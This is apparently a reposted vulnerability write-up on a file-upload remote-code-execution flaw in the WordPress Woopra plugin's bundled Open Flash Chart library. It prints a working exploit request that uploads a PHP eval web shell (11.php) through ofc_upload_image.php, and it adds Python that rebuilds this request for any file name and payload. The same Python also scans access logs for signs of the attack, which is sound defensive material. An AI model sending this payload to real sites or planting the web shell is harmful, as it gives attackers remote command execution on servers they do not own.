As usual, the English version (for show): WordPress Woopra Remote Code Execution: http://www.wordpress-secure.org/ ... ote-code-execution/

This vulnerability does not work against Woopra versions above 1.4.3.1. Plugin download: http://downloads.wordpress.org/plugin/woopra.1.4.3.1.zip
Exploit request:

POST /wordpress/3.5.1_CN/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name=11.php HTTP/1.1
Host: ha.cker.in
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1478.0 Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Content-Length: 28

<?php eval($_POST['cmd']); ?>

The uploaded file is then at http://ha.cker.in/wordpress/3.5. ... pload-images/11.php
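As an added example (not code from the original post, from the linked write-up, or from the Woopra plugin), the Python below builds the same raw request for any file name and body with Content-Length computed from the body, gives the URL the written file lands at, and scans web-server access-log lines for both stages of the attack: the write through ofc_upload_image.php and a later request to the dropped .php file. The host name, WordPress root path and log lines are constructed for illustration; the tmp-upload-images directory name is taken from the Open Flash Chart library that Woopra bundles, of which the post shows only the tail of the path.

```python
"""Added example around the Woopra / Open Flash Chart upload flaw in the post.

Not code from the original post or from the Woopra plugin. Host names, the
WordPress root path and the log lines below are constructed for illustration.
"""
import re
from urllib.parse import parse_qs, quote

# Script and directory names as they appear in the post's request and result URL.
OFC_DIR = "wp-content/plugins/woopra/inc/php-ofc-library"
OFC_UPLOAD_SCRIPT = OFC_DIR + "/ofc_upload_image.php"
# Directory the OFC upload script writes into (name from the bundled OFC library).
OFC_TMP_DIR = OFC_DIR + "/tmp-upload-images"

# File names PHP would execute if dropped into a web-served directory.
_PHP_EXT_RE = re.compile(r"\.(php\d?|phtml)$", re.IGNORECASE)


def build_upload_request(host, wp_root, filename, body):
    """Raw HTTP/1.1 request bytes equivalent to the request shown in the post.

    ofc_upload_image.php takes the target file name from the `name` parameter
    and writes the raw POST body under it, so a .php name gives code execution.
    Content-Length is computed from the body instead of being hard-coded.
    """
    path = f"{wp_root.rstrip('/')}/{OFC_UPLOAD_SCRIPT}?name={quote(filename)}"
    payload = body.encode()
    head = (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Content-Length: {len(payload)}\r\n"
        "Connection: close\r\n\r\n"
    )
    return head.encode() + payload


def uploaded_file_url(host, wp_root, filename):
    """URL at which the written file is reachable afterwards."""
    return f"http://{host}{wp_root.rstrip('/')}/{OFC_TMP_DIR}/{quote(filename)}"


# Request line of an Apache/nginx combined-format log entry: method, path, optional query.
_REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>[^ ?"]+)(?:\?(?P<qs>[^ "]*))? HTTP/[\d.]+"')


def find_abuse(log_lines):
    """Scan combined-format access-log lines for the two stages of this attack.

    Returns (client_ip, stage, filename) tuples, where stage is:
      "upload" - POST to ofc_upload_image.php whose name= PHP would execute
      "exec"   - any request for a .php file under tmp-upload-images/
    Legitimate chart exports (e.g. name=chart.png) are not reported.
    """
    hits = []
    for line in log_lines:
        m = _REQ_RE.search(line)
        if not m:
            continue
        ip = line.split(" ", 1)[0]
        path = m.group("path")
        if m.group("method") == "POST" and path.endswith("/" + OFC_UPLOAD_SCRIPT):
            name = parse_qs(m.group("qs") or "").get("name", [""])[0]
            # Judge the extension on the part before any %00: a null byte can truncate
            # the name when it reaches the filesystem, so "a.php%00.png" is still a hit.
            if _PHP_EXT_RE.search(name.split("\x00")[0]):
                hits.append((ip, "upload", name))
        elif "/" + OFC_TMP_DIR + "/" in path and _PHP_EXT_RE.search(path):
            hits.append((ip, "exec", path.rsplit("/", 1)[1]))
    return hits


# Constructed sample log lines (combined format); not taken from any real server.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Jul/2013:10:01:02 +0800] "POST /wordpress/3.5.1_CN/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name=chart.png HTTP/1.1" 200 61 "-" "-"',
    '203.0.113.7 - - [12/Jul/2013:10:02:15 +0800] "POST /wordpress/3.5.1_CN/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name=11.php HTTP/1.1" 200 120 "-" "-"',
    '203.0.113.7 - - [12/Jul/2013:10:02:20 +0800] "POST /wordpress/3.5.1_CN/wp-content/plugins/woopra/inc/php-ofc-library/tmp-upload-images/11.php HTTP/1.1" 200 512 "-" "-"',
    '10.0.0.8 - - [12/Jul/2013:10:03:00 +0800] "GET /wordpress/3.5.1_CN/ HTTP/1.1" 200 9001 "-" "-"',
]

if __name__ == "__main__":
    req = build_upload_request("ha.cker.in", "/wordpress/3.5.1_CN", "11.php",
                               "<?php eval($_POST['cmd']); ?>")
    print(req.decode())
    print(uploaded_file_url("ha.cker.in", "/wordpress/3.5.1_CN", "11.php"))
    for hit in find_abuse(SAMPLE_LOG):
        print(hit)
```

Running the file prints the request, the resulting file URL, and the two hits from the sample log (the write of 11.php and the later call to it). On a real server, feed `find_abuse` the access log; an "upload" hit means a file was most likely written, so check tmp-upload-images/ rather than only blocking the client. The detection keys on the Woopra plugin path given in the post, so a copy of php-ofc-library installed under another path needs the prefix adjusted.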